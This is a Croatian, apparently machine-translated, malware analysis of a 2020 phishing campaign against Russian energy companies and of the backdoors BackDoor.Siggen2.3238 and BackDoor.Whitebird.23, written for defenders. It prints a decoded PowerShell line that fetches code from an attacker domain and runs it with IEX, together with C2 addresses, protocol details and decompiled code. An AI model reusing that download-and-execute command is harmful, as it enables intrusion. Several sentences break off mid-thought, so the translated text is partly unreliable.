Naše iskustvo u istraživanju incidenata računalne sigurnosti pokazuje da je e-pošta još uvijek jedan od najčešćih kanala koje napadači koriste za početni prodor u napadnutu mrežnu infrastrukturu. Jedna neoprezna radnja sa sumnjivim (ili ne tako sumnjivim) pismom postaje ulazna točka za daljnju infekciju, zbog čega kibernetički kriminalci aktivno koriste metode socijalnog inženjeringa, iako s različitim stupnjevima uspjeha.
U ovom postu želimo govoriti o našoj nedavnoj istrazi kampanje neželjene pošte usmjerene na brojna poduzeća u ruskom kompleksu goriva i energije. Svi napadi slijedili su isti scenarij korištenjem lažnih e-poruka, a čini se da se nitko nije previše potrudio oko tekstualnog sadržaja tih e-poruka.
Obavještajna služba
Sve je počelo krajem travnja 2020., kada su analitičari virusa Doctor Web otkrili spam kampanju u kojoj su hakeri poslali ažurirani telefonski imenik zaposlenicima niza poduzeća u ruskom gorivo i energetskom kompleksu. Naravno, ovo nije bilo jednostavno pokazivanje zabrinutosti, budući da imenik nije bio pravi, a .docx dokumenti preuzeli su dvije slike s udaljenih izvora.
Jedan od njih preuzet je na računalo korisnika s servera news[.]zannews[.]com. Važno je napomenuti da je naziv domene sličan domeni antikorupcijskog medijskog centra Kazahstana - zannews[.]kz. S druge strane, korištena domena odmah je podsjetila na drugu kampanju iz 2015. poznatu kao TOPNEWS, koja je koristila ICEFOG backdoor i imala trojanske kontrolne domene s podstringom “vijesti” u svojim imenima. Još jedna zanimljiva značajka bila je da su prilikom slanja e-pošte različitim primateljima zahtjevi za preuzimanje slike koristili različite parametre zahtjeva ili jedinstvena imena slika.
Vjerujemo da je to učinjeno u svrhu prikupljanja informacija kako bi se identificirao “pouzdani” adresat, koji bi potom zajamčeno otvorio pismo u pravom trenutku. SMB protokol korišten je za preuzimanje slike s drugog servera, čime se mogu prikupiti NetNTLM hashovi s računala zaposlenika koji su otvorili primljeni dokument.
A evo i samog pisma s lažnim imenikom:
U lipnju ove godine hakeri su počeli koristiti novi naziv domene, sports[.]manhajnews[.]com, za učitavanje slika. Analiza je pokazala da se poddomene manhajnews[.]com koriste u neželjenoj pošti najmanje od rujna 2019. Jedna od meta ove kampanje bilo je veliko rusko sveučilište.
Također, u lipnju su organizatori napada osmislili novi tekst za svoja pisma: ovaj put dokument je sadržavao informacije o razvoju industrije. Tekst pisma jasno je ukazivao da njegov autor ili nije izvorni govornik ruskog jezika, ili je namjerno stvarao takav dojam o sebi. Nažalost, ideje o razvoju industrije, kao i uvijek, pokazale su se samo paravanom - dokument je ponovno preuzeo dvije slike, dok je server promijenjen na download[.]inklingpaper[.]com.
Sljedeća inovacija uslijedila je u srpnju. U pokušaju da zaobiđu otkrivanje zlonamjernih dokumenata od strane antivirusnih programa, napadači su počeli koristiti Microsoft Word dokumente šifrirane lozinkom. Pritom su se napadači odlučili poslužiti klasičnom tehnikom društvenog inženjeringa – nagradnom obavijesti.
Tekst apela ponovno je napisan u istom stilu, što je izazvalo dodatnu sumnju kod adresata. Poslužitelj za preuzimanje slike također se nije promijenio.
Imajte na umu da su u svim slučajevima za slanje pisama korišteni elektronički poštanski sandučići registrirani na domenama mail[.]ru i yandex[.]ru.
Napad
Do početka rujna 2020. došlo je vrijeme za akciju. Naši analitičari virusa zabilježili su novi val napada, u kojem su napadači ponovno slali pisma pod izlikom ažuriranja telefonskog imenika. Međutim, ovaj put privitak je sadržavao zlonamjernu makronaredbu.
Prilikom otvaranja priloženog dokumenta, makronaredba je stvorila dvije datoteke:
- VBS skripta %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, koja je bila namijenjena pokretanju batch datoteke;
- Sama batch datoteka %APPDATA%configstest.bat, koja je bila maskirana.
Suština njegovog rada svodi se na pokretanje Powershell ljuske s određenim parametrima. Parametri proslijeđeni ljusci dekodiraju se u naredbe:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;
Kao što slijedi iz predstavljenih naredbi, domena s koje se preuzima sadržaj ponovno je prerušena u stranicu s vijestima. Jednostavan
Stražnja vrata.Siggen2.3238
Prvi je Stražnja vrata.Siggen2.3238 — naši se stručnjaci prije nisu susreli, a drugi proizvođači antivirusnih programa također nisu spominjali ovaj program.
Ovaj program je backdoor napisan u C++ i radi na 32-bitnim Windows operativnim sustavima.
Stražnja vrata.Siggen2.3238 može komunicirati s poslužiteljem za upravljanje pomoću dva protokola: HTTP i HTTPS. Testirani uzorak koristi HTTPS protokol. Sljedeći korisnički agent koristi se u zahtjevima prema poslužitelju:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
U ovom slučaju, svi zahtjevi se isporučuju sa sljedećim skupom parametara:
%s;type=%s;length=%s;realdata=%send
gdje je svaki redak %s odgovarajuće zamijenjen sa:
- ID zaraženog računala,
- vrsta zahtjeva koji se šalje,
- duljina podataka u polju realdata,
- podaci.
U fazi prikupljanja informacija o zaraženom sustavu, backdoor generira red poput:
lan=%s;cmpname=%s;username=%s;version=%s;
gdje je lan IP adresa zaraženog računala, cmpname je ime računala, korisničko ime je korisničko ime, verzija je linija 0.0.4.03.
Ove informacije s identifikatorom sysinfo šalju se putem POST zahtjeva na kontrolni poslužitelj koji se nalazi na https[:]//31.214[.]157.14/log.txt. Ako u odgovoru Stražnja vrata.Siggen2.3238 prima signal HEART, veza se smatra uspješnom, a backdoor započinje glavni ciklus komunikacije s poslužiteljem.
Potpuniji opis principa rada Stražnja vrata.Siggen2.3238 je u našem
Stražnja Vrata.Whitebird.23
Drugi program je modifikacija backdoora BackDoor.Whitebird, koji nam je već poznat iz incidenta s vladinom agencijom u Kazahstanu. Ova verzija je napisana u C++ i dizajnirana je za rad na 32-bitnim i 64-bitnim Windows operativnim sustavima.
Kao i većina programa ove vrste, Stražnja Vrata.Whitebird.23 dizajniran za uspostavljanje šifrirane veze s kontrolnim poslužiteljem i neovlaštenu kontrolu nad zaraženim računalom. Instaliran u ugroženi sustav pomoću kapaljke
Uzorak koji smo ispitali bila je zlonamjerna biblioteka s dva izvoza:
- Google Play
- Test.
Na početku svog rada dekriptira konfiguraciju ugrađenu u backdoor tijelo pomoću algoritma temeljenog na operaciji XOR s bajtom 0x99. Konfiguracija izgleda ovako:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Kako bi osigurao svoj stalni rad, backdoor mijenja vrijednost navedenu u polju radni sati konfiguracije. Polje sadrži 1440 bajtova koji imaju vrijednosti 0 ili 1 i predstavljaju svaku minutu svakog sata u danu. Stvara zasebnu nit za svako mrežno sučelje koje sluša sučelje i traži autorizacijske pakete na proxy poslužitelju sa zaraženog računala. Kada se otkrije takav paket, backdoor dodaje informacije o proxy poslužitelju na svoj popis. Osim toga, provjerava prisutnost proxyja putem WinAPI-ja InternetQueryOptionW.
Program provjerava trenutne minute i sate i uspoređuje ih s podacima u polju radni sati konfiguracije. Ako vrijednost za odgovarajuću minutu u danu nije nula, uspostavlja se veza s kontrolnim poslužiteljem.
Uspostavljanje veze s poslužiteljem simulira stvaranje veze pomoću TLS protokola verzije 1.0 između klijenta i poslužitelja. Tijelo stražnjih vrata sadrži dva odbojnika.
Prvi međuspremnik sadrži TLS 1.0 Client Hello paket.
Drugi međuspremnik sadrži pakete za razmjenu ključeva klijenta TLS 1.0 s duljinom ključa od 0x100 bajtova, specifikaciju promjene šifre, šifriranu poruku rukovanja.
Prilikom slanja paketa Client Hello, backdoor zapisuje 4 bajta trenutnog vremena i 28 bajtova pseudo-slučajnih podataka u polje Client Random, izračunato na sljedeći način:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Primljeni paket se šalje kontrolnom poslužitelju. Odgovor (paket Hello poslužitelja) provjerava:
- usklađenost s TLS protokolom verzije 1.0;
- podudarnost vremenske oznake (prva 4 bajta polja paketa slučajnih podataka) koju je naveo klijent vremenskoj žigi koju je naveo poslužitelj;
- podudaranje prva 4 bajta nakon vremenske oznake u polju Random Data klijenta i poslužitelja.
U slučaju navedenih podudaranja, backdoor priprema paket za razmjenu ključeva klijenta. Da bi to učinio, modificira javni ključ u paketu za razmjenu ključeva klijenta, kao i šifriranje IV i podatke o šifriranju u paketu šifrirane poruke rukovanja.
Backdoor tada prima paket od poslužitelja za naredbe i kontrolu, provjerava je li verzija TLS protokola 1.0, a zatim prihvaća još 54 bajta (tijelo paketa). Ovo dovršava postavljanje veze.
Potpuniji opis principa rada Stražnja Vrata.Whitebird.23 je u našem
Zaključak i zaključci
Analiza dokumenata, zlonamjernog softvera i korištene infrastrukture omogućuje nam da s pouzdanjem tvrdimo da je napad pripremila jedna od kineskih APT skupina. S obzirom na funkcionalnost backdoora koji se instaliraju na računala žrtava u slučaju uspješnog napada, infekcija minimalno dovodi do krađe povjerljivih informacija s računala napadnutih organizacija.
Osim toga, vrlo vjerojatan scenarij je instaliranje specijaliziranih trojanaca na lokalne poslužitelje s posebnom funkcijom. To mogu biti kontroleri domene, poslužitelji e-pošte, internetski pristupnici itd. Kao što smo mogli vidjeti u primjeru
Izvor: www.habr.com